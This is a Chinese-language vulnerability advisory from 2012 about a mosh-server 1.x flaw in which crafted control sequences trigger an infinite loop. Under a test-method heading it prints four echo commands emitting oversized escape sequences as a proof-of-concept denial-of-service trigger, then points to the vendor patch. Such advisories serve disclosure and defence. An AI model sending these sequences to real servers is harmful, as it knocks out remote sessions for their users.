发布日期：2012-05-21
更新日期：2012-05-23

受影响系统：

Mosh Mosh 1.x

描述：

---

BUGTRAQ  ID: 53646

Mosh是代替SSH的移动壳，允许漫游、支持断点连接、提供智能本地回应和用户击键行编辑的远程终端应用，可用于GNU/Linux、FreeBSD、Mac OS X。

mosh-server在处理命令时存在错误，可被利用传递控制符到服务器并触发无限循环。

<*来源：Timo Juhani Lindfors （timo.lindfors@iki.fi）
  
  链接：http://secunia.com/advisories/49260/
        https://github.com/keithw/mosh/issues/271
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

echo -en "\e[2147483647L"
echo -en "\e[2147483647M"
echo -en "\e[2147483647@"
echo -en "\e[2147483647P"

建议：

---

厂商补丁：

Mosh
----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://mosh.mit.edu/

浏览次数：2142
严重程度：0（网友投票）